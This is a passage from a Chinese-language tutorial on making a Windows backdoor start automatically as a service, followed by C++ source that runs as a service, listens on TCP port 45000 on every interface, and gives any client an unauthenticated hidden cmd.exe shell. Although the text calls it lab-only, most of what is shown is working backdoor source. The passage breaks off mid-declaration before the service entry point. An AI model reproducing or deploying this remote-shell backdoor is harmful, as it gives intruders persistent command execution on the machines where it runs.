简介
Windows NT系统后门要实现自启动，有许多种方法，例如注册表自启动、映像劫持技术、SVCHost自启动以及本章节介绍的服务自启动等方法。需要说明的是，服务自启动同样依赖注册表（服务配置保存在 HKLM\SYSTEM\CurrentControlSet\Services 之下），服务的创建与启动通常也会被服务控制管理器记录到系统事件日志中，因此它并不比上述其他三种方式更难被发现，只是落点和检查方式不同。另外，本章节的示例在自启动之后会在所有网卡上开放一个无需认证的远程 shell，并以服务账户的权限运行，仅应在隔离的实验环境中用于理解原理。
//////////////////////////////////////////////////////////////
//
// FileName : ServiceAutoRunDemo.cpp
// Creator : PeterZ1997
// Date : 2018-5-4 23:19
// Comment : Create Service to make the BackDoor Run Automatically
//
//////////////////////////////////////////////////////////////
// NOTE(review): the original #include list was lost when this page was extracted
// (only bare "#include" tokens survived); these are the headers the code below uses.
#include <winsock2.h>   // must come before <windows.h>
#include <windows.h>
#include <winsvc.h>
#include <cstdio>
#include <cstring>
#include <iostream>
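#pragma comment(lib, "ws2_32.lib")

using namespace std;

#define SERVICE_OP_ERROR    -1
#define SERVICE_ALREADY_RUN -2

const unsigned int MAX_COUNT  = 255;    /// Max length of the cmd.exe path buffer
const DWORD        PORT       = 45000;  /// TCP port the shell listens on
const unsigned int LINK_COUNT = 30;     /// Max number of clients served per service start

SERVICE_STATUS        g_ServiceStatus;
SERVICE_STATUS_HANDLE g_hServiceStatus;

/// Listening socket, kept global so the SCM stop handler can close it and thereby
/// unblock the accept() loop in RunService(). Written from two threads without a
/// lock -- acceptable for this demo, not for production code.
static SOCKET g_sListen = INVALID_SOCKET;

/**
 * @brief  SCM control handler: maps a control code to a service state and reports it.
 * @param  dwCode  SERVICE_CONTROL_* code delivered by the Service Control Manager.
 *
 * PAUSE/CONTINUE only change the reported state; the listener keeps running.
 * On STOP the listening socket is closed so RunService()'s accept() loop ends;
 * shells that are already connected are not torn down here. Whether ServiceMain()
 * additionally waits for the worker thread is not visible in this listing.
 */
void WINAPI ServiceControl(DWORD dwCode)
{
    switch (dwCode) {
    case SERVICE_CONTROL_PAUSE:
        g_ServiceStatus.dwCurrentState = SERVICE_PAUSED;
        break;
    case SERVICE_CONTROL_CONTINUE:
        g_ServiceStatus.dwCurrentState = SERVICE_RUNNING;
        break;
    case SERVICE_CONTROL_STOP:
        g_ServiceStatus.dwCurrentState  = SERVICE_STOPPED;
        g_ServiceStatus.dwWin32ExitCode = 0;
        g_ServiceStatus.dwCheckPoint    = 0;
        g_ServiceStatus.dwWaitHint      = 0;
        // Closing the listener makes the blocked accept() return INVALID_SOCKET.
        if (g_sListen != INVALID_SOCKET) {
            closesocket(g_sListen);
            g_sListen = INVALID_SOCKET;
        }
        break;
    case SERVICE_CONTROL_INTERROGATE:
        break;   // current status is simply re-reported below
    default:
        break;
    }

    if (SetServiceStatus(g_hServiceStatus, &g_ServiceStatus) == 0) {
        printf("Set Service Status Error\n");
    }
}

/**
 * @brief  Serve one client: run a hidden cmd.exe whose stdin/stdout/stderr are the
 *         client's socket, wait for it to exit, then release the socket.
 * @param  lpParam  the accepted client SOCKET, cast to LPVOID.
 * @return always 0.
 *
 * SECURITY: there is no authentication at all -- whoever reaches the port gets a
 * shell running under the service process's token. Lab/demo code only.
 */
DWORD WINAPI StartShell(LPVOID lpParam)
{
    SOCKET sClient = (SOCKET)lpParam;
    if (sClient == INVALID_SOCKET) {
        return 0;   // a failed accept() was handed to us; nothing to serve
    }

    // Absolute path to cmd.exe so the shell is not resolved through PATH.
    CHAR cmdline[MAX_COUNT] = { 0 };
    UINT nLen = GetSystemDirectoryA(cmdline, sizeof(cmdline));
    if (nLen == 0 || nLen >= sizeof(cmdline) ||
        strcat_s(cmdline, sizeof(cmdline), "\\cmd.exe") != 0) {
        closesocket(sClient);
        return 0;
    }

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    GetStartupInfoA(&si);
    si.cb = sizeof(STARTUPINFOA);
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)sClient;
    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
    si.wShowWindow = SW_HIDE;

    // The child can only use the socket as a std handle if it is inheritable.
    SetHandleInformation((HANDLE)sClient, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);

    // The original retried CreateProcess forever; bound it so a persistent
    // failure cannot leave a thread spinning for the life of the service.
    BOOL bStarted = FALSE;
    for (int nTry = 0; nTry < 10 && !bStarted; ++nTry) {
        bStarted = CreateProcessA(NULL, cmdline, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
        if (!bStarted) {
            Sleep(100);
        }
    }

    // Clear inheritability again so cmd.exe processes started later by other
    // threads (bInheritHandles=TRUE) do not also receive this client's socket.
    // A small window remains while another thread is inside CreateProcess.
    SetHandleInformation((HANDLE)sClient, HANDLE_FLAG_INHERIT, 0);

    if (bStarted) {
        WaitForSingleObject(pi.hProcess, INFINITE);
        CloseHandle(pi.hProcess);
        CloseHandle(pi.hThread);
    }

    // The child held its own inherited copy; ours is no longer needed.
    closesocket(sClient);
    return 0;
}

/**
 * @brief  Worker thread: bind PORT on every interface, accept up to LINK_COUNT
 *         clients, give each one a shell thread, wait for all of them, clean up.
 * @param  lpParam  unused.
 * @return always 0 (bind/listen/WSAStartup failures are silent apart from the
 *         WSAStartup message, as in the original).
 *
 * SECURITY: binds INADDR_ANY, unauthenticated, plaintext. The shells run with
 * whatever account the service was installed under (installation not shown here).
 */
DWORD WINAPI RunService(LPVOID lpParam)
{
    (void)lpParam;
    CHAR wMessage[MAX_COUNT] = "<================= Welcome to Back Door >_< ==================>\n";
    HANDLE hThread[LINK_COUNT];
    DWORD  nThreads = 0;
    DWORD  dwThreadId = 0;

    WSADATA wsd;
    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0) {
        printf("WSAStartup Process Error\n");
        return 0;
    }

    g_sListen = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (g_sListen == INVALID_SOCKET) {
        WSACleanup();
        return 0;
    }
    // Keep the listener out of every cmd.exe spawned with bInheritHandles=TRUE.
    SetHandleInformation((HANDLE)g_sListen, HANDLE_FLAG_INHERIT, 0);

    sockaddr_in sin;
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = htons((u_short)PORT);
    sin.sin_addr.S_un.S_addr = htonl(INADDR_ANY);   // every interface, deliberately (demo)

    if (bind(g_sListen, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR ||
        listen(g_sListen, (int)LINK_COUNT) == SOCKET_ERROR) {
        closesocket(g_sListen);
        g_sListen = INVALID_SOCKET;
        WSACleanup();
        return 0;
    }

    for (unsigned int i = 0; i < LINK_COUNT; i++) {
        SOCKET s = accept(g_sListen, NULL, NULL);
        if (s == INVALID_SOCKET) {
            break;   // listener closed by the stop handler, or a fatal accept error
        }
        // Accepted sockets start out inheritable; withhold that until the
        // client's own shell thread needs it.
        SetHandleInformation((HANDLE)s, HANDLE_FLAG_INHERIT, 0);

        // Banner before the shell starts, so it is not interleaved with cmd.exe output.
        send(s, wMessage, (int)strlen(wMessage), 0);

        HANDLE h = CreateThread(NULL, 0, StartShell, (LPVOID)s, 0, &dwThreadId);
        if (h == NULL) {
            closesocket(s);   // nobody will ever service this client
            continue;
        }
        hThread[nThreads++] = h;
    }

    // LINK_COUNT (30) is below MAXIMUM_WAIT_OBJECTS, so a single wait suffices.
    if (nThreads > 0) {
        WaitForMultipleObjects(nThreads, hThread, TRUE, INFINITE);
        for (DWORD k = 0; k < nThreads; k++) {
            CloseHandle(hThread[k]);
        }
    }

    if (g_sListen != INVALID_SOCKET) {
        closesocket(g_sListen);
        g_sListen = INVALID_SOCKET;
    }
    WSACleanup();
    return 0;
}

/**
 * @brief the Main Function of the Service
 */
void WI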